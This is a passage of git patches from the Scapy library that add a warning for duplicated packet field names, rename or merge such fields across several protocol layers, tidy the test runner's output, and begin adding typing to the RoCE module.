%s" % (m, e)) + if VERB > 2: + print(" " + arrow + " Booting scapy...", file=sys.stderr) + try: + from scapy import all as scapy + except Exception as e: + print("[CRITICAL]: Cannot import Scapy: %s" % e, file=sys.stderr) + traceback.print_exc() + sys.exit(1) # Abort the tests - # Add SCAPY_ROOT_DIR environment variable, used for tests - os.environ['SCAPY_ROOT_DIR'] = os.environ.get("PWD", os.getcwd()) + for m in MODULES: + try: + mod = import_module(m) + six.moves.builtins.__dict__.update(mod.__dict__) + except ImportError as e: + raise getopt.GetoptError("cannot import [%s]: %s" % (m, e)) - except getopt.GetoptError as msg: - print("ERROR:", msg, file=sys.stderr) - raise SystemExit + # Add SCAPY_ROOT_DIR environment variable, used for tests + os.environ['SCAPY_ROOT_DIR'] = os.environ.get("PWD", os.getcwd()) autorun_func = { Format.TEXT: scapy.autorun_get_text_interactive_session, @@ -1037,7 +1100,7 @@ def main(): } if VERB > 2: - print("### Starting tests...", file=sys.stderr) + print(" " + arrow + " Discovering tests files...", file=sys.stderr) glob_output = "" glob_result = 0 @@ -1064,13 +1127,17 @@ def main(): # Execute all files for TESTFILE in TESTFILES: if VERB > 2: - print("### Loading:", TESTFILE, file=sys.stderr) + print(theme.green(dash + " Loading: %s" % TESTFILE), file=sys.stderr) PREEXEC = PREEXEC_DICT[TESTFILE] if TESTFILE in PREEXEC_DICT else GLOB_PREEXEC with open(TESTFILE) as testfile: output, result, campaign = execute_campaign( testfile, OUTPUTFILE, PREEXEC, NUM, KW_OK, KW_KO, DUMP, DOCS, - FORMAT, VERB, ONLYFAILED, CRC, INTERPRETER, autorun_func, - pos_begin, ignore_globals, copy.copy(scapy_ses)) + FORMAT, VERB, ONLYFAILED, CRC, INTERPRETER, + autorun_func, theme, + pos_begin=pos_begin, + ignore_globals=ignore_globals, + scapy_ses=copy.copy(scapy_ses) + ) runned_campaigns.append(campaign) pos_begin = campaign.end_pos if UNIQUE: @@ -1082,7 +1149,10 @@ def main(): break if VERB > 2: - print("### Writing output...", file=sys.stderr) + print( + checkmark + " All campaigns executed. Writing output...", + file=sys.stderr + ) if ANNOTATIONS_MODE: collect_types.stop() diff --git a/test/configs/bsd.utsc b/test/configs/bsd.utsc index bbdf5a6f88b..7354ea3d6d3 100644 --- a/test/configs/bsd.utsc +++ b/test/configs/bsd.utsc @@ -23,7 +23,6 @@ "test/sslv2.uts": "load_layer(\"tls\")", "test/tls*.uts": "load_layer(\"tls\")" }, - "format": "text", "kw_ko": [ "linux", "windows", diff --git a/test/configs/linux.utsc b/test/configs/linux.utsc index 4e8d15dc295..741a8993ee9 100644 --- a/test/configs/linux.utsc +++ b/test/configs/linux.utsc @@ -22,7 +22,6 @@ "test/sslv2.uts": "load_layer(\"tls\")", "test/tls*.uts": "load_layer(\"tls\")" }, - "format": "text", "kw_ko": [ "osx", "windows", diff --git a/test/configs/solaris.utsc b/test/configs/solaris.utsc index 6a401f4425a..e6642f4222e 100644 --- a/test/configs/solaris.utsc +++ b/test/configs/solaris.utsc @@ -24,7 +24,6 @@ "test/sslv2.uts": "load_layer(\"tls\")", "test/tls*.uts": "load_layer(\"tls\")" }, - "format": "text", "kw_ko": [ "osx", "linux", diff --git a/test/configs/windows.utsc b/test/configs/windows.utsc index 74f39073d6e..21a3b59f481 100644 --- a/test/configs/windows.utsc +++ b/test/configs/windows.utsc @@ -21,7 +21,6 @@ "test\\sslv2.uts": "load_layer(\"tls\")", "test\\tls*.uts": "load_layer(\"tls\")" }, - "format": "text", "kw_ko": [ "osx", "linux", diff --git a/test/run_tests b/test/run_tests index 3d65a511cb5..1ca9beeb97f 100755 --- a/test/run_tests +++ b/test/run_tests @@ -20,4 +20,4 @@ then echo "WARNING: '$PYTHON' not found, using 'python' instead." PYTHON=python fi -PYTHONPATH=$DIR exec "$PYTHON" ${DIR}/scapy/tools/UTscapy.py "$@" +PYTHONPATH=$DIR exec "$PYTHON" ${DIR}/scapy/tools/UTscapy.py $ARGS From 8c0e499752510f0f7b9a845f82239d2bf4397b22 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 8 Oct 2020 22:55:08 +0200 Subject: [PATCH 0304/1632] Raise warning on duplicated field names --- scapy/base_classes.py | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/scapy/base_classes.py b/scapy/base_classes.py index 4c34ede648c..b2805706a9f 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -21,6 +21,7 @@ import socket import subprocess import types +import warnings from scapy.compat import FAKE_TYPING from scapy.consts import WINDOWS @@ -214,7 +215,20 @@ def __new__(cls, name, bases, dct): if resolved_fld: # perform default value replacements final_fld = [] + names = [] for f in resolved_fld: + if f.name in names: + war_msg = ( + "Packet '%s' has a duplicated '%s' field ! " + "If you are using several ConditionalFields, have " + "a look at MultipleTypeField instead ! This will " + "become a SyntaxError in a future version of " + "Scapy !" % ( + name, f.name + ) + ) + warnings.warn(war_msg, SyntaxWarning) + names.append(f.name) if f.name in dct: f = f.copy() f.default = dct[f.name] From cfe00d5c952e9048a40150390e0025b5ceff7228 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 8 Oct 2020 23:33:43 +0200 Subject: [PATCH 0305/1632] Fix all duplicated fields in layers --- scapy/layers/bluetooth.py | 53 ++++++++++------ scapy/layers/dot11.py | 14 ++--- scapy/layers/dot15d4.py | 35 ++++++++--- scapy/layers/inet.py | 41 ++++++++++--- scapy/layers/netbios.py | 4 +- scapy/layers/sctp.py | 40 +++++++++---- scapy/layers/zigbee.py | 123 +++++++++++++++----------------------- test/regression.uts | 4 +- 8 files changed, 184 insertions(+), 130 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index b5440e36dc0..956a096cfa2 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -19,11 +19,30 @@ from scapy.config import conf from scapy.data import DLT_BLUETOOTH_HCI_H4, DLT_BLUETOOTH_HCI_H4_WITH_PHDR from scapy.packet import bind_layers, Packet -from scapy.fields import ByteEnumField, ByteField, Field, FieldLenField, \ - FieldListField, FlagsField, IntField, LEShortEnumField, LEShortField, \ - LenField, PacketListField, SignedByteField, StrField, StrFixedLenField, \ - StrLenField, XByteField, BitField, XLELongField, PadField, UUIDField, \ - XStrLenField, ConditionalField +from scapy.fields import ( + BitField, + ByteEnumField, + ByteField, + Field, + FieldLenField, + FieldListField, + FlagsField, + IntField, + LEShortEnumField, + LEShortField, + LenField, + MultipleTypeField, + PacketListField, + PadField, + SignedByteField, + StrField, + StrFixedLenField, + StrLenField, + UUIDField, + XByteField, + XLELongField, + XStrLenField, +) from scapy.supersocket import SuperSocket from scapy.sendrecv import sndrcv from scapy.data import MTU @@ -393,20 +412,16 @@ class ATT_Find_Information_Response(Packet): name = "Find Information Response" fields_desc = [ XByteField("format", 1), - ConditionalField( - PacketListField( - "handles", [], - ATT_Handle, - ), - lambda pkt: pkt.format == 1 - ), - ConditionalField( - PacketListField( - "handles", [], - ATT_Handle_UUID128, - ), - lambda pkt: pkt.format == 2 - )] + MultipleTypeField( + [ + (PacketListField("handles", [], ATT_Handle), + lambda pkt: pkt.format == 1), + (PacketListField("handles", [], ATT_Handle_UUID128), + lambda pkt: pkt.format == 2), + ], + StrFixedLenField("handles", "", length=0) + ) + ] class ATT_Find_By_Type_Value_Request(Packet): diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index e6032b84b85..b4efc99b47a 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -1258,29 +1258,29 @@ class Dot11EltHTCapabilities(Dot11Elt): {0: "20Mhz", 1: "20Mhz+40Mhz"}), BitField("LDPC_Coding_Capability", 0, 1, end_tot_size=-2), # A-MPDU Parameters: 1B - BitField("res", 0, 3, tot_size=-1), + BitField("res1", 0, 3, tot_size=-1), BitField("Min_MPDCU_Start_Spacing", 8, 3), BitField("Max_A_MPDU_Length_Exponent", 3, 2, end_tot_size=-1), # Supported MCS set: 16B - BitField("res", 0, 27, tot_size=-16), + BitField("res2", 0, 27, tot_size=-16), BitField("TX_Unequal_Modulation", 0, 1), BitField("TX_Max_Spatial_Streams", 0, 2), BitField("TX_RX_MCS_Set_Not_Equal", 0, 1), BitField("TX_MCS_Set_Defined", 0, 1), - BitField("res", 0, 6), + BitField("res3", 0, 6), BitField("RX_Highest_Supported_Data_Rate", 0, 10), - BitField("res", 0, 3), + BitField("res4", 0, 3), BitField("RX_MSC_Bitmask", 0, 77, end_tot_size=-16), # HT Extended capabilities: 2B - BitField("res", 0, 4, tot_size=-2), + BitField("res5", 0, 4, tot_size=-2), BitField("RD_Responder", 0, 1), BitField("HTC_HT_Support", 0, 1), BitField("MCS_Feedback", 0, 2), - BitField("res", 0, 5), + BitField("res6", 0, 5), BitField("PCO_Transition_Time", 0, 2), BitField("PCO", 0, 1, end_tot_size=-2), # TX Beamforming Capabilities TxBF: 4B - BitField("res", 0, 3, tot_size=-4), + BitField("res7", 0, 3, tot_size=-4), BitField("Channel_Estimation_Capability", 0, 2), BitField("CSI_max_n_Rows_Beamformer_Supported", 0, 2), BitField("Compressed_Steering_n_Beamformer_Antennas_Supported", 0, 2), diff --git a/scapy/layers/dot15d4.py b/scapy/layers/dot15d4.py index 40ecf2bf98c..9412c9dfea9 100644 --- a/scapy/layers/dot15d4.py +++ b/scapy/layers/dot15d4.py @@ -19,9 +19,24 @@ from scapy.data import DLT_IEEE802_15_4_WITHFCS, DLT_IEEE802_15_4_NOFCS from scapy.packet import Packet, bind_layers -from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ - ConditionalField, Field, LELongField, PacketField, XByteField, \ - XLEIntField, XLEShortField, FCSField, Emph, FieldListField +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + ConditionalField, + Emph, + FCSField, + Field, + FieldListField, + LELongField, + MultipleTypeField, + PacketField, + StrFixedLenField, + XByteField, + XLEIntField, + XLEShortField, +) # Fields # @@ -193,12 +208,14 @@ class Dot15d4AuxSecurityHeader(Packet): XLEIntField("sec_framecounter", 0x00000000), # 4 octets # Key Identifier (variable length): identifies the key that is used for cryptographic protection # noqa: E501 # Key Source : length of sec_keyid_keysource varies btwn 0, 4, and 8 bytes depending on sec_sc_keyidmode # noqa: E501 - # 4 octets when sec_sc_keyidmode == 2 - ConditionalField(XLEIntField("sec_keyid_keysource", 0x00000000), - lambda pkt: pkt.getfieldval("sec_sc_keyidmode") == 2), - # 8 octets when sec_sc_keyidmode == 3 - ConditionalField(LELongField("sec_keyid_keysource", 0x0000000000000000), # noqa: E501 - lambda pkt: pkt.getfieldval("sec_sc_keyidmode") == 3), + MultipleTypeField([ + # 4 octets when sec_sc_keyidmode == 2 + (XLEIntField("sec_keyid_keysource", 0x00000000), + lambda pkt: pkt.getfieldval("sec_sc_keyidmode") == 2), + # 8 octets when sec_sc_keyidmode == 3 + (LELongField("sec_keyid_keysource", 0x0000000000000000), + lambda pkt: pkt.getfieldval("sec_sc_keyidmode") == 3), + ], StrFixedLenField("sec_keyid_keysource", "", length=0)), # Key Index (1 octet): allows unique identification of different keys with the same originator # noqa: E501 ConditionalField(XByteField("sec_keyid_keyindex", 0xFF), lambda pkt: pkt.getfieldval("sec_sc_keyidmode") != 0), diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index eb70e2ec14a..edfd2ef22bd 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -28,11 +28,31 @@ from scapy.config import conf from scapy.extlib import plt, MATPLOTLIB, MATPLOTLIB_INLINED, \ MATPLOTLIB_DEFAULT_PLOT_KARGS -from scapy.fields import ConditionalField, IPField, BitField, BitEnumField, \ - FieldLenField, StrLenField, ByteField, ShortField, ByteEnumField, \ - DestField, FieldListField, FlagsField, IntField, MultiEnumField, \ - PacketListField, ShortEnumField, SourceIPField, StrField, \ - StrFixedLenField, XByteField, XShortField, Emph +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + ConditionalField, + DestField, + Emph, + FieldLenField, + FieldListField, + FlagsField, + IPField, + IntField, + MultiEnumField, + MultipleTypeField, + PacketListField, + ShortEnumField, + ShortField, + SourceIPField, + StrField, + StrFixedLenField, + StrLenField, + XByteField, + XShortField, +) from scapy.packet import Packet, bind_layers, bind_bottom_up, NoPayload from scapy.volatile import RandShort, RandInt, RandBin, RandNum, VolatileValue from scapy.sendrecv import sr, sr1 @@ -852,8 +872,15 @@ class ICMP(Packet): ConditionalField(ByteField("length", 0), lambda pkt:pkt.type in [3, 11, 12]), # noqa: E501 ConditionalField(IPField("addr_mask", "0.0.0.0"), lambda pkt:pkt.type in [17, 18]), # noqa: E501 ConditionalField(ShortField("nexthopmtu", 0), lambda pkt:pkt.type == 3), # noqa: E501 - ConditionalField(ShortField("unused", 0), lambda pkt:pkt.type in [11, 12]), # noqa: E501 - ConditionalField(IntField("unused", 0), lambda pkt:pkt.type not in [0, 3, 5, 8, 11, 12, 13, 14, 15, 16, 17, 18]) # noqa: E501 + MultipleTypeField( + [ + (ShortField("unused", 0), + lambda pkt:pkt.type in [11, 12]), + (IntField("unused", 0), + lambda pkt:pkt.type not in [0, 3, 5, 8, 11, 12, + 13, 14, 15, 16, 17, + 18]) + ], StrFixedLenField("unused", "", length=0)), ] def post_build(self, p, pay): diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 8eb3e740468..6f2c9595696 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -260,10 +260,10 @@ class NBTDatagram(Packet): ShortField("Offset", 0), NetBIOSNameField("SourceName", "windows"), ShortEnumField("SUFFIX1", 0x4141, _NETBIOS_SUFFIXES), - ByteField("NULL", 0), + ByteField("NULL1", 0), NetBIOSNameField("DestinationName", "windows"), ShortEnumField("SUFFIX2", 0x4141, _NETBIOS_SUFFIXES), - ByteField("NULL", 0)] + ByteField("NULL2", 0)] class NBTSession(Packet): diff --git a/scapy/layers/sctp.py b/scapy/layers/sctp.py index e6634b90c12..df6494fe0e7 100644 --- a/scapy/layers/sctp.py +++ b/scapy/layers/sctp.py @@ -15,10 +15,26 @@ from scapy.volatile import RandBin from scapy.config import conf from scapy.packet import Packet, bind_layers -from scapy.fields import BitField, ByteEnumField, ConditionalField, Field, \ - FieldLenField, FieldListField, IPField, IntEnumField, IntField, \ - PacketListField, PadField, ShortEnumField, ShortField, StrLenField, \ - XByteField, XIntField, XShortField +from scapy.fields import ( + BitField, + ByteEnumField, + Field, + FieldLenField, + FieldListField, + IPField, + IntEnumField, + IntField, + MultipleTypeField, + PacketListField, + PadField, + ShortEnumField, + ShortField, + StrFixedLenField, + StrLenField, + XByteField, + XIntField, + XShortField, +) from scapy.layers.inet import IP from scapy.layers.inet6 import IP6Field from scapy.layers.inet6 import IPv6 @@ -396,12 +412,16 @@ class SCTPChunkParamAddIPAddr(_SCTPChunkParam, Packet): ShortEnumField("addr_type", 5, sctpchunkparamtypes), FieldLenField("addr_len", None, length_of="addr", adjust=lambda pkt, x:x + 4), - ConditionalField( - IPField("addr", "127.0.0.1"), - lambda p: p.addr_type == 5), - ConditionalField( - IP6Field("addr", "::1"), - lambda p: p.addr_type == 6), ] + MultipleTypeField( + [ + (IPField("addr", "127.0.0.1"), + lambda p: p.addr_type == 5), + (IP6Field("addr", "::1"), + lambda p: p.addr_type == 6), + ], + StrFixedLenField("addr", "", + length_from=lambda pkt: pkt.addr_len)) + ] class SCTPChunkParamDelIPAddr(SCTPChunkParamAddIPAddr): diff --git a/scapy/layers/zigbee.py b/scapy/layers/zigbee.py index 0a1ece3fc36..6b8090ef50f 100644 --- a/scapy/layers/zigbee.py +++ b/scapy/layers/zigbee.py @@ -322,45 +322,29 @@ class ZigbeeNWKCommandPayload(Packet): # - Route Request Command - # # Command options (1 octet) - ConditionalField(BitField("reserved", 0, 1), lambda pkt: pkt.cmd_identifier == 1), # noqa: E501 - ConditionalField(BitField("multicast", 0, 1), lambda pkt: pkt.cmd_identifier == 1), # noqa: E501 + ConditionalField(BitField("res1", 0, 1), + lambda pkt: pkt.cmd_identifier in [1, 2]), + ConditionalField(BitField("multicast", 0, 1), + lambda pkt: pkt.cmd_identifier in [1, 2]), ConditionalField(BitField("dest_addr_bit", 0, 1), lambda pkt: pkt.cmd_identifier == 1), # noqa: E501 ConditionalField( BitEnumField("many_to_one", 0, 2, { 0: "not_m2one", 1: "m2one_support_rrt", 2: "m2one_no_support_rrt", 3: "reserved"} # noqa: E501 ), lambda pkt: pkt.cmd_identifier == 1), - ConditionalField(BitField("reserved", 0, 3), lambda pkt: pkt.cmd_identifier == 1), # noqa: E501 - # Route request identifier (1 octet) - ConditionalField(ByteField("route_request_identifier", 0), lambda pkt: pkt.cmd_identifier == 1), # noqa: E501 - # Destination address (2 octets) - ConditionalField(XLEShortField("destination_address", 0x0000), lambda pkt: pkt.cmd_identifier == 1), # noqa: E501 - # Path cost (1 octet) - ConditionalField(ByteField("path_cost", 0), lambda pkt: pkt.cmd_identifier == 1), # noqa: E501 - # Destination IEEE Address (0/8 octets), only present when dest_addr_bit has a value of 1 # noqa: E501 - ConditionalField(dot15d4AddressField("ext_dst", 0, adjust=lambda pkt, x: 8), # noqa: E501 - lambda pkt: (pkt.cmd_identifier == 1 and pkt.dest_addr_bit == 1)), # noqa: E501 + ConditionalField(BitField("res2", 0, 3), lambda pkt: pkt.cmd_identifier == 1), # noqa: E501 # - Route Reply Command - # # Command options (1 octet) - ConditionalField(BitField("reserved", 0, 1), lambda pkt: pkt.cmd_identifier == 2), # noqa: E501 - ConditionalField(BitField("multicast", 0, 1), lambda pkt: pkt.cmd_identifier == 2), # noqa: E501 ConditionalField(BitField("responder_addr_bit", 0, 1), lambda pkt: pkt.cmd_identifier == 2), # noqa: E501 ConditionalField(BitField("originator_addr_bit", 0, 1), lambda pkt: pkt.cmd_identifier == 2), # noqa: E501 - ConditionalField(BitField("reserved", 0, 4), lambda pkt: pkt.cmd_identifier == 2), # noqa: E501 + ConditionalField(BitField("res3", 0, 4), lambda pkt: pkt.cmd_identifier == 2), # noqa: E501 # Route request identifier (1 octet) - ConditionalField(ByteField("route_request_identifier", 0), lambda pkt: pkt.cmd_identifier == 2), # noqa: E501 + ConditionalField(ByteField("route_request_identifier", 0), + lambda pkt: pkt.cmd_identifier in [1, 2]), # noqa: E501 # Originator address (2 octets) ConditionalField(XLEShortField("originator_address", 0x0000), lambda pkt: pkt.cmd_identifier == 2), # noqa: E501 # Responder address (2 octets) ConditionalField(XLEShortField("responder_address", 0x0000), lambda pkt: pkt.cmd_identifier == 2), # noqa: E501 - # Path cost (1 octet) - ConditionalField(ByteField("path_cost", 0), lambda pkt: pkt.cmd_identifier == 2), # noqa: E501 - # Originator IEEE address (0/8 octets) - ConditionalField(dot15d4AddressField("originator_addr", 0, adjust=lambda pkt, x: 8), # noqa: E501 - lambda pkt: (pkt.cmd_identifier == 2 and pkt.originator_addr_bit == 1)), # noqa: E501 - # Responder IEEE address (0/8 octets) - ConditionalField(dot15d4AddressField("responder_addr", 0, adjust=lambda pkt, x: 8), # noqa: E501 - lambda pkt: (pkt.cmd_identifier == 2 and pkt.responder_addr_bit == 1)), # noqa: E501 # - Network Status Command - # # Status code (1 octet) @@ -387,7 +371,20 @@ class ZigbeeNWKCommandPayload(Packet): # 0x13 - 0xff Reserved }), lambda pkt: pkt.cmd_identifier == 3), # Destination address (2 octets) - ConditionalField(XLEShortField("destination_address", 0x0000), lambda pkt: pkt.cmd_identifier == 3), # noqa: E501 + ConditionalField(XLEShortField("destination_address", 0x0000), + lambda pkt: pkt.cmd_identifier in [1, 3]), + # Path cost (1 octet) + ConditionalField(ByteField("path_cost", 0), + lambda pkt: pkt.cmd_identifier in [1, 2]), # noqa: E501 + # Destination IEEE Address (0/8 octets), only present when dest_addr_bit has a value of 1 # noqa: E501 + ConditionalField(dot15d4AddressField("ext_dst", 0, adjust=lambda pkt, x: 8), # noqa: E501 + lambda pkt: (pkt.cmd_identifier == 1 and pkt.dest_addr_bit == 1)), # noqa: E501 + # Originator IEEE address (0/8 octets) + ConditionalField(dot15d4AddressField("originator_addr", 0, adjust=lambda pkt, x: 8), # noqa: E501 + lambda pkt: (pkt.cmd_identifier == 2 and pkt.originator_addr_bit == 1)), # noqa: E501 + # Responder IEEE address (0/8 octets) + ConditionalField(dot15d4AddressField("responder_addr", 0, adjust=lambda pkt, x: 8), # noqa: E501 + lambda pkt: (pkt.cmd_identifier == 2 and pkt.responder_addr_bit == 1)), # noqa: E501 # - Leave Command - # # Command options (1 octet) @@ -398,7 +395,7 @@ class ZigbeeNWKCommandPayload(Packet): # Bit 5: Rejoin ConditionalField(BitField("rejoin", 0, 1), lambda pkt: pkt.cmd_identifier == 4), # noqa: E501 # Bit 0 - 4: Reserved - ConditionalField(BitField("reserved", 0, 5), lambda pkt: pkt.cmd_identifier == 4), # noqa: E501 + ConditionalField(BitField("res4", 0, 5), lambda pkt: pkt.cmd_identifier == 4), # noqa: E501 # - Route Record Command - # # Relay count (1 octet) @@ -427,7 +424,7 @@ class ZigbeeNWKCommandPayload(Packet): # - Link Status Command - # # Command options (1 octet) - ConditionalField(BitField("reserved", 0, 1), lambda pkt:pkt.cmd_identifier == 8), # Reserved # noqa: E501 + ConditionalField(BitField("res5", 0, 1), lambda pkt:pkt.cmd_identifier == 8), # Reserved # noqa: E501 ConditionalField(BitField("last_frame", 0, 1), lambda pkt:pkt.cmd_identifier == 8), # Last frame # noqa: E501 ConditionalField(BitField("first_frame", 0, 1), lambda pkt:pkt.cmd_identifier == 8), # First frame # noqa: E501 ConditionalField(BitField("entry_count", 0, 5), lambda pkt:pkt.cmd_identifier == 8), # Entry count # noqa: E501 @@ -442,8 +439,6 @@ class ZigbeeNWKCommandPayload(Packet): BitEnumField("report_command_identifier", 0, 3, {0: "PAN identifier conflict"}), # 0x01 - 0x07 Reserved # noqa: E501 lambda pkt: pkt.cmd_identifier == 9), ConditionalField(BitField("report_information_count", 0, 5), lambda pkt: pkt.cmd_identifier == 9), # noqa: E501 - # EPID: Extended PAN ID (8 octets) - ConditionalField(dot15d4AddressField("epid", 0, adjust=lambda pkt, x: 8), lambda pkt: pkt.cmd_identifier == 9), # noqa: E501 # Report information (variable length) # Only present if we have a PAN Identifier Conflict Report ConditionalField( @@ -459,7 +454,10 @@ class ZigbeeNWKCommandPayload(Packet): lambda pkt: pkt.cmd_identifier == 10), ConditionalField(BitField("update_information_count", 0, 5), lambda pkt: pkt.cmd_identifier == 10), # noqa: E501 # EPID: Extended PAN ID (8 octets) - ConditionalField(dot15d4AddressField("epid", 0, adjust=lambda pkt, x: 8), lambda pkt: pkt.cmd_identifier == 10), # noqa: E501 + ConditionalField( + dot15d4AddressField("epid", 0, adjust=lambda pkt, x: 8), + lambda pkt: pkt.cmd_identifier in [9, 10] + ), # Update Id (1 octet) ConditionalField(ByteField("update_id", 0), lambda pkt: pkt.cmd_identifier == 10), # noqa: E501 # Update Information (Variable) @@ -504,7 +502,7 @@ class ZigbeeNWKCommandPayload(Packet): lambda pkt: pkt.cmd_identifier == 12), # Parent Information (1 octet) ConditionalField( - BitField("reserved", 0, 6), + BitField("res6", 0, 6), lambda pkt: pkt.cmd_identifier == 12), ConditionalField( BitField("ed_timeout_req_keepalive", 0, 1), @@ -740,10 +738,18 @@ class ZigbeeAppCommandPayload(Packet): lambda pkt: pkt.cmd_identifier in [1, 2, 3, 4]), ConditionalField(StrFixedLenField("data", 0, length=16), lambda pkt: pkt.cmd_identifier in [1, 2, 3, 4]), - # Transport-key Command + # Confirm-key command + ConditionalField( + ByteEnumField("status", 0, _ApsStatusValues), + lambda pkt: pkt.cmd_identifier == 16), + # Common fields ConditionalField( ByteEnumField("key_type", 0, _TransportKeyKeyTypes), - lambda pkt: pkt.cmd_identifier == 5), + lambda pkt: pkt.cmd_identifier in [5, 8, 15, 16]), + ConditionalField(dot15d4AddressField("address", 0, + adjust=lambda pkt, x: 8), + lambda pkt: pkt.cmd_identifier in [6, 7, 15, 16]), + # Transport-key Command ConditionalField( StrFixedLenField("key", None, 16), lambda pkt: pkt.cmd_identifier == 5), @@ -753,50 +759,35 @@ class ZigbeeAppCommandPayload(Packet): pkt.key_type in [0x01, 0x05])), ConditionalField( dot15d4AddressField("dest_addr", 0, adjust=lambda pkt, x: 8), - lambda pkt: (pkt.cmd_identifier == 5 and - pkt.key_type not in [0x02, 0x03])), + lambda pkt: ((pkt.cmd_identifier == 5 and + pkt.key_type not in [0x02, 0x03]) or + pkt.cmd_identifier == 14)), ConditionalField( dot15d4AddressField("src_addr", 0, adjust=lambda pkt, x: 8), lambda pkt: (pkt.cmd_identifier == 5 and pkt.key_type not in [0x02, 0x03])), ConditionalField( dot15d4AddressField("partner_addr", 0, adjust=lambda pkt, x: 8), - lambda pkt: (pkt.cmd_identifier == 5 and - pkt.key_type in [0x02, 0x03])), + lambda pkt: ((pkt.cmd_identifier == 5 and + pkt.key_type in [0x02, 0x03]) or + (pkt.cmd_identifier == 8 and pkt.key_type == 0x02))), ConditionalField( ByteField("initiator_flag", 0), lambda pkt: (pkt.cmd_identifier == 5 and pkt.key_type in [0x02, 0x03])), # Update-Device Command - ConditionalField(dot15d4AddressField("address", 0, - adjust=lambda pkt, x: 8), - lambda pkt: pkt.cmd_identifier == 6), ConditionalField(XLEShortField("short_address", 0), lambda pkt: pkt.cmd_identifier == 6), - ConditionalField(ByteField("status", 0), + ConditionalField(ByteField("update_status", 0), lambda pkt: pkt.cmd_identifier == 6), - # Remove-Device Command - ConditionalField(dot15d4AddressField("address", 0, - adjust=lambda pkt, x: 8), - lambda pkt: pkt.cmd_identifier == 7), - # Request-Key Command - ConditionalField( - ByteEnumField("key_type", 0, _RequestKeyKeyTypes), - lambda pkt: pkt.cmd_identifier == 8), - ConditionalField( - dot15d4AddressField("partner_addr", 0, adjust=lambda pkt, x: 8), - lambda pkt: (pkt.cmd_identifier == 8 and pkt.key_type == 0x02)), # Switch-Key Command ConditionalField(StrFixedLenField("seqnum", None, 8), lambda pkt: pkt.cmd_identifier == 9), # Un-implemented: 10-13 (+?) - ConditionalField(StrField("data", ""), + ConditionalField(StrField("unimplemented", ""), lambda pkt: (pkt.cmd_identifier >= 10 and pkt.cmd_identifier <= 13)), # Tunnel Command - ConditionalField( - dot15d4AddressField("dest_addr", 0, adjust=lambda pkt, x: 8), - lambda pkt: pkt.cmd_identifier == 14), ConditionalField( FlagsField("frame_control", 2, 4, [ "ack_format", @@ -824,25 +815,9 @@ class ZigbeeAppCommandPayload(Packet): ByteField("counter", 0), lambda pkt: pkt.cmd_identifier == 14), # Verify-Key Command - ConditionalField( - ByteEnumField("key_type", 0, _TransportKeyKeyTypes), - lambda pkt: pkt.cmd_identifier == 15), - ConditionalField( - dot15d4AddressField("address", 0, adjust=lambda pkt, x: 8), - lambda pkt: pkt.cmd_identifier == 15), ConditionalField( StrFixedLenField("key_hash", None, 16), lambda pkt: pkt.cmd_identifier == 15), - # Confirm-Key Command - ConditionalField( - ByteEnumField("status", 0, _ApsStatusValues), - lambda pkt: pkt.cmd_identifier == 16), - ConditionalField( - ByteEnumField("key_type", 0, _TransportKeyKeyTypes), - lambda pkt: pkt.cmd_identifier == 16), - ConditionalField( - dot15d4AddressField("address", 0, adjust=lambda pkt, x: 8), - lambda pkt: pkt.cmd_identifier == 16) ] def guess_payload_class(self, payload): @@ -885,10 +860,10 @@ class ZigbeeNWKStub(Packet): name = "Zigbee Network Layer for Inter-PAN Transmission" fields_desc = [ # NWK frame control - BitField("reserved", 0, 2), # remaining subfields shall have a value of 0 # noqa: E501 + BitField("res1", 0, 2), # remaining subfields shall have a value of 0 # noqa: E501 BitField("proto_version", 2, 4), BitField("frametype", 0b11, 2), # 0b11 (3) is a reserved frame type - BitField("reserved", 0, 8), # remaining subfields shall have a value of 0 # noqa: E501 + BitField("res2", 0, 8), # remaining subfields shall have a value of 0 # noqa: E501 ] def guess_payload_class(self, payload): diff --git a/test/regression.uts b/test/regression.uts index 3d148ac4458..cde27d3dbe7 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -11122,7 +11122,7 @@ assert f.Green_Field == 0 assert f.SM_Power_Save == 3 assert f.Supported_Channel_Width == 0 assert f.LDPC_Coding_Capability == 1 -assert f.res == 0 +assert f.res1 == 0 assert f.Min_MPDCU_Start_Spacing == 5 assert f.Max_A_MPDU_Length_Exponent == 3 assert f.TX_Unequal_Modulation == 0 @@ -11175,7 +11175,7 @@ assert f.Green_Field == 0 assert f.SM_Power_Save == 3 assert f.Supported_Channel_Width == 0 assert f.LDPC_Coding_Capability == 0 -assert f.res == 5 +assert f.res1 == 5 assert f.Min_MPDCU_Start_Spacing == 7 assert f.Max_A_MPDU_Length_Exponent == 3 assert f.TX_Unequal_Modulation == 0 From 85abf7d32a65dccbaa38f9f23415e91e861d83c1 Mon Sep 17 00:00:00 2001 From: Haggai Eran Date: Fri, 9 Oct 2020 10:51:43 +0300 Subject: [PATCH 0306/1632] Add typing to the RoCE module --- .config/mypy/mypy_enabled.txt | 1 + scapy/contrib/roce.py | 6 ++++++ 2 files changed, 7 insertions(+) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 51696bc46d9..9eb098aab4a 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -13,3 +13,4 @@ scapy/config.py scapy/fields.py scapy/packet.py scapy/plist.py +scapy/contrib/roce.py diff --git a/scapy/contrib/roce.py b/scapy/contrib/roce.py index 091fa363346..cc9a2a37ae1 100644 --- a/scapy/contrib/roce.py +++ b/scapy/contrib/roce.py @@ -19,6 +19,7 @@ from scapy.error import warning from zlib import crc32 import struct +from 